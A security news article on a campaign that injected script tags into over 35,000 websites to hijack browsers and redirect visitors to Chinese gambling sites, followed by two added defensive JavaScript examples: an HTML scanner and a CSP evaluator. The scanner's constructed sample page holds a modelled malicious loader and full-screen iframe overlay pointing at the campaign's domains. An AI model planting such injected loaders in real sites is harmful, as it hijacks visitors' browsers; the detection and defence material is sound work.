35,000+ Websites Hacked To Inject Malicious Scripts Redirecting Users To Chinese Websites

Mar 3, 2025 - 15:33

A massive cybersecurity breach has compromised over 35,000 websites, injecting malicious scripts that completely hijack users’ browser windows and redirect them to Chinese-language gambling platforms.

The attack, identified on February 20th, 2025, appears to target regions where Mandarin is common, with the final landing pages promoting gambling content under the “Kaiyun” brand.

Security researchers at c/side have discovered that attackers place a simple one-line script tag in the affected websites’ source code, which then loads additional malicious code.

The initial infection begins with an injected script tag that references domains such as zuizhongjs[.]com, mlbetjs[.]com, ptfafajs[.]com, and others.

For example, the following script tag has been found injected into thousands of websites:

Injected malicious script code in affected websites (Source – Cside)

Once loaded, this initial script creates another script element to fetch additional malicious code from domains like deski.fastcloudcdn[.]com.

The primary payload employs device-detection techniques and inserts random delays of between 500 and 1000 milliseconds before acting, a common trick for evading automated scanners that do not wait long enough for delayed code to run.

The most concerning aspect of this attack is the complete takeover of the browser window.

Researchers at c/side noted that the malicious script injects code that writes a full-screen iframe, effectively replacing the original website content with the attacker’s gambling platform.

The code creates a div element that spans the entire viewport and loads content from URLs like “https://www.zuizhongjs[.]com/go/kaiyun1/ky.html”.

Full-page hijacking that redirects users to Chinese gambling websites (Source – Cside)

Infection Process

The attack operates through multiple stages of code execution. After the initial script has loaded, the payload uses JavaScript functions to detect the visitor's device type, checking whether they are on a mobile device and which operating system, such as iOS, they are running.

This allows the malicious content to be delivered selectively. For instance, the code includes functions such as isMobile() and getIosVersion() to tailor the payload to specific devices.

The script then writes a meta viewport tag so that the malicious content fills the entire screen, leaving users no way to reach the original website's content.

The code snippet responsible for creating the fullscreen overlay uses document.write() calls that inject HTML and CSS to position an iframe absolutely over the entire page.
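The chain described above (an injected script tag on one of the named domains, a createElement('script') loader for the second stage, and a document.write() that drops a viewport-filling iframe) leaves traces that can be found statically. The Node.js scanner below is an added example and is not c/side's tooling or code from the campaign: it walks a page's HTML, flags script sources on the domains named in this article or outside an allowlist, and flags inline scripts that dynamically load scripts or write an iframe. The www.example.com site, its allowlisted hosts, the file paths on the indicator domains and both sample pages are constructed for the example; the malicious snippets in the sample are modelled on the article's description, not real captures.

```javascript
// Added example (not c/side's tooling, not code from the campaign): a static
// scan of a page's HTML for the traces this campaign leaves behind. Run it with
// Node.js over a crawled or downloaded copy of the site.

// Domains named in the article, stored defanged and re-armed for matching.
const IOC_DOMAINS = [
  'zuizhongjs[.]com',
  'mlbetjs[.]com',
  'ptfafajs[.]com',
  'deski.fastcloudcdn[.]com',
].map((d) => d.replace(/\[\.\]/g, '.'));

// Hypothetical site and the hosts it legitimately loads scripts from
// (assumptions; replace with the real origin and allowlist).
const SITE_ORIGIN = 'https://www.example.com';
const ALLOWED_SCRIPT_HOSTS = new Set(['www.example.com', 'cdn.example.com']);

// Resolve a possibly relative src against the site origin and return its host,
// or null when the value cannot be parsed as a URL.
function hostOf(src, origin = SITE_ORIGIN) {
  try {
    return new URL(src, origin).hostname;
  } catch {
    return null;
  }
}

// True when host is one of the IOC domains or a subdomain of one.
function isIocHost(host) {
  const h = host.toLowerCase();
  return IOC_DOMAINS.some((d) => h === d || h.endsWith('.' + d));
}

// Scan raw HTML and return {kind, detail} findings in document order.
function scanHtml(html) {
  const findings = [];

  // Stage 1: the one-line <script src=...> injection. IOC hosts are flagged
  // outright; any host outside the allowlist is flagged for manual review.
  const extRe = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  for (let m; (m = extRe.exec(html)) !== null; ) {
    const host = hostOf(m[1]);
    if (host === null) continue;
    if (isIocHost(host)) findings.push({ kind: 'ioc-script-src', detail: m[1] });
    else if (!ALLOWED_SCRIPT_HOSTS.has(host)) findings.push({ kind: 'unlisted-script-src', detail: m[1] });
  }

  // Inline scripts: the stage-2 loader (createElement('script') pointing at an
  // IOC host) and the overlay (document.write of an iframe).
  const inlineRe = /<script\b(?![^>]*\bsrc\s*=)[^>]*>([\s\S]*?)<\/script>/gi;
  for (let m; (m = inlineRe.exec(html)) !== null; ) {
    const body = m[1];
    for (const d of IOC_DOMAINS) {
      if (body.toLowerCase().includes(d)) findings.push({ kind: 'ioc-domain-inline', detail: d });
    }
    if (/createElement\s*\(\s*['"]script['"]\s*\)/i.test(body)) {
      findings.push({ kind: 'dynamic-script-loader', detail: body.slice(0, 60) });
    }
    if (/document\.write\s*\(/i.test(body) && /<iframe\b/i.test(body)) {
      findings.push({ kind: 'document-write-iframe', detail: body.slice(0, 60) });
    }
  }
  return findings;
}

// Constructed sample page modelled on the article's description of the
// injection; not a real capture, and the paths on the IOC domains are made up.
const INFECTED_PAGE = `<!doctype html><html><head><title>Shop</title>
<script src="https://cdn.example.com/app.js"></script>
<script src="https://www.zuizhongjs.com/js/a.js"></script>
</head><body>
<script>var s=document.createElement('script');s.src='https://deski.fastcloudcdn.com/x.js';document.head.appendChild(s);</script>
<script>document.write('<meta name="viewport" content="width=device-width"><div style="position:fixed;top:0;left:0;width:100%;height:100%"><iframe src="https://www.zuizhongjs.com/go/kaiyun1/ky.html" style="width:100%;height:100%;border:0"></iframe></div>');</script>
</body></html>`;

// Constructed clean page: only first-party and allowlisted scripts.
const CLEAN_PAGE = `<html><head><script src="/static/app.js"></script>
<script src="https://cdn.example.com/lib.js"></script></head>
<body><script>console.log('hello');</script></body></html>`;

for (const f of scanHtml(INFECTED_PAGE)) console.log(`${f.kind}: ${f.detail}`);
console.log('clean page findings:', scanHtml(CLEAN_PAGE).length);
```

The regex-based parse is deliberate: a compromised page may be malformed or carry obfuscated markup that a DOM parser would silently repair, and an attacker who writes the HTML can also rewrite it, so the output is a lead for the file-integrity check rather than proof of a clean site. Region-based filtering of the kind described below is invisible to a static scan of the served HTML; only fetching the page from several vantage points would reveal it.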

Some variants of the attack implement region-based filtering, serving different content depending on the visitor's IP address; some visitors instead see an access-blocked message instructing them to contact supposed support channels.

This filtering may be designed to reduce exposure to security researchers or to keep unwanted traffic away from the malicious domains.

Security experts suggest this campaign may be connected to the Megalayer exploit, known for distributing Chinese-language malware.

Website owners are advised to audit their source code for unauthorized script tags, block the malicious domains at the firewall or DNS layer, monitor for unauthorized file modifications, deploy a Content Security Policy that restricts where scripts and frames may be loaded from, and scan their sites regularly with tools such as PublicWWW or URLScan to uncover injections.
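To make the Content Security Policy advice concrete, here is an added example (not from the article or c/side) of a small CSP evaluator that tests whether a policy would let the browser fetch the campaign's loader and overlay URLs. The hypothetical site at www.example.com, its CDN host, the weak and hardened policies, and the script paths on the indicator domains are assumptions; only the domains and the ky.html overlay URL come from the article.

```javascript
// Added example (not from the article or c/side): a small Content-Security-Policy
// evaluator for checking offline whether a candidate policy would stop the browser
// from loading the URLs this campaign uses. It handles 'self', 'none', '*', scheme
// sources, host sources with an optional leading "*." and path prefix, and the
// default-src fallback. A teaching model, not a full CSP3 implementation.

const DEFAULT_PORT = { 'https:': '443', 'http:': '80', 'wss:': '443', 'ws:': '80' };

// Split a header value into a Map of directive name -> list of source expressions.
function parsePolicy(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  return directives;
}

// Does one source expression permit `url` on a page served from `pageOrigin`?
function sourceMatches(expr, url, pageOrigin) {
  if (expr.startsWith("'")) {
    // Keyword sources: only 'self' can admit a URL; 'none', 'unsafe-inline', etc. never do.
    return expr.toLowerCase() === "'self'" && url.origin === pageOrigin.origin;
  }
  if (expr === '*') return url.protocol in DEFAULT_PORT; // any network scheme
  if (/^[a-z][a-z0-9+.-]*:$/i.test(expr)) return url.protocol === expr.toLowerCase(); // scheme-source
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^\/:]+)(?::(\d+|\*))?(\/.*)?$/i.exec(expr);
  if (!m) return false; // not a host-source we understand: fail closed
  const [, scheme, wildcard, host, port, path] = m;
  if (scheme) {
    if (url.protocol !== scheme.toLowerCase() + ':') return false;
  } else if (url.protocol !== pageOrigin.protocol && url.protocol !== 'https:') {
    return false; // schemeless host-source: the page's scheme, or an https upgrade
  }
  const h = host.toLowerCase();
  if (wildcard ? !url.hostname.endsWith('.' + h) : url.hostname !== h) return false;
  const urlPort = url.port || DEFAULT_PORT[url.protocol] || '';
  if (port && port !== '*' && urlPort !== port) return false;
  if (path && !url.pathname.startsWith(path)) return false; // prefix match, simplified
  return true;
}

// Would the browser allow `urlString` under `directive`? Falls back to default-src
// when the directive is absent; with neither present the load is unrestricted.
function isAllowed(policy, directive, urlString, pageOriginString) {
  const directives = parsePolicy(policy);
  const sources = directives.has(directive) ? directives.get(directive) : directives.get('default-src');
  if (sources === undefined) return true;
  const url = new URL(urlString);
  const pageOrigin = new URL(pageOriginString);
  return sources.some((s) => sourceMatches(s, url, pageOrigin));
}

// Hypothetical victim site (assumption).
const PAGE = 'https://www.example.com';
// The domains come from the article; the script paths are made up. The ky.html
// overlay URL is the one the article quotes.
const STAGE1 = 'https://www.zuizhongjs.com/js/a.js';
const STAGE2 = 'https://deski.fastcloudcdn.com/x.js';
const OVERLAY = 'https://www.zuizhongjs.com/go/kaiyun1/ky.html';

// A permissive policy that stops nothing, beside a hardened one (both assumed).
const WEAK_POLICY = "default-src * 'unsafe-inline'";
const HARDENED_POLICY =
  "default-src 'self'; script-src 'self' https://cdn.example.com; frame-src 'none'; object-src 'none'";

// Which of the campaign's loads (and the site's own CDN script) the policy allows.
function report(policy) {
  return {
    stage1: isAllowed(policy, 'script-src', STAGE1, PAGE),
    stage2: isAllowed(policy, 'script-src', STAGE2, PAGE),
    overlay: isAllowed(policy, 'frame-src', OVERLAY, PAGE),
    ownCdn: isAllowed(policy, 'script-src', 'https://cdn.example.com/app.js', PAGE),
  };
}

console.log('weak    ', report(WEAK_POLICY));
console.log('hardened', report(HARDENED_POLICY));
```

Under the hardened policy all three stages fail: the injected script tag and the second-stage loader fail script-src, and the overlay iframe fails frame-src 'none'; because 'unsafe-inline' is absent, the inline script that calls document.write() would not execute in the first place. Two caveats apply. An attacker with write access to the web root may also be able to alter the server configuration or response headers, and a policy delivered through a meta http-equiv tag lives in the very file being tampered with, so the header belongs in the web server or CDN configuration, and the file-integrity monitoring and regular scans remain necessary. Nonces, hashes and 'strict-dynamic' are not modelled here.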


The post 35,000+ Websites Hacked To Inject Malicious Scripts Redirecting Users To Chinese Websites appeared first on Cyber Security News.